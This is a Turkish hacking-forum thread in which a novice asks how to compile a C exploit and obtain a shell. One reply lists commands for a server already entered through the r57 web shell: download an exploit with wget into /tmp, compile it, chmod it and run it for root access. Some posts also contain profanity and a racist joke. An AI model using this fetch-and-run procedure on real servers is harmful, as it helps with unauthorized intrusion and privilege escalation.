Bu Shell Bedavaya Gelir Mi?
-
bende acık var exploit var salak bi tane beles shell de var ama ben bu exploiti derleyemıyorum sebepler
1.bana ssh lazım beleste telnet var
2.sitelerde verılen shell adreslerini kullandıgım zman pass ve id istiyor
1 linuz kursam linuzun shelli hani bu paralı shellerin yerine gecermi yani 2. sebebin cözümü olurmu
2. biri bana shell pass ve id versin
cavabınızı beklıyorum şimdiden saolun
-
dediklerinden bi boq anlamadım desem birazda düzgün yaz anlaşılır shell şifremi istio?
-
linuz kur sen :D
-
Bi bok anladıysam zenci olmıyım (olmak istiomda :D)
Exploit derliceksen eğer perl exploitler için active perl kurman lazım.İllede shell istiyosan grex.org dan veriyolar.
-
at bna exploiti pmden derleyeym ya da konuya yaz farketmez xD
vmwareda linux cok baba bisi oluyo xD
-
c uzantılı exploit derlicem putty ile hack sitelerinde verilen shell adreslerine baglanıyom benden şifre ve id istiyorlar malum elimizde hiç bi poq yok öle kala kalıyoz bende diyorum ki linux kursam ondakı shelle c uzantılı exploit derleyebilirmiyim ben para verıpte shell almak istemiyorum o maksatta
-
rif ile girdiğin bi serverıda c exploitleri derlemek için kullabilirsin ama her server izin vermiyo a.q gcc komutuna....
-
wget http://exploit.com
gcc -o root
chmod 777 exploit
./exploit
tabi bunu yapman icin r57 ile bağlanıp yazma izini olan bi yere gecmen lazım tmp dizini %99 uygundur
normal exe ise şöyle
gcc -o output input.c
output:oluşacak exe dosyasının adı
input:kaynakkodu -
fivestar bunu yazdı:
-----------------------------gcc -o output input.c
output:oluşacak exe dosyasının adı
input:kaynakkodu
-----------------------------oluşucak exe dosyası mı xD
-
linux kurmaNA gerek yok yukarida sana nasil derleyecegini anlatmislar C de yazilmis bir exploitin (gerci birisi active perl olayina girmis : )) senin bunu yapman icin illa bir shell e ihtiyacin yok yada linux u kurmaya... milletden shell isteme sikini kes kasaba muhtac olma... PHLAK, Whoppix gibi CD den calisan linuxlardan birini temin et yada googleda birazcik arastirma yaparak guvenlik uzerine yapilmis bootable linux bul (phlak tavsiyem) indir bunu kullan derim....
-
oluşacak exe dosyası : D
Linux kurmanada gerek yok live linux arkadasımızın dedigi gibi işini görür..buda ollmazsa cygwin türü programda olur oda .c ile yazılmış exploitleri derleyebilir..onun resimli acıklaması bir sitede vardı istersen pm ile atarım..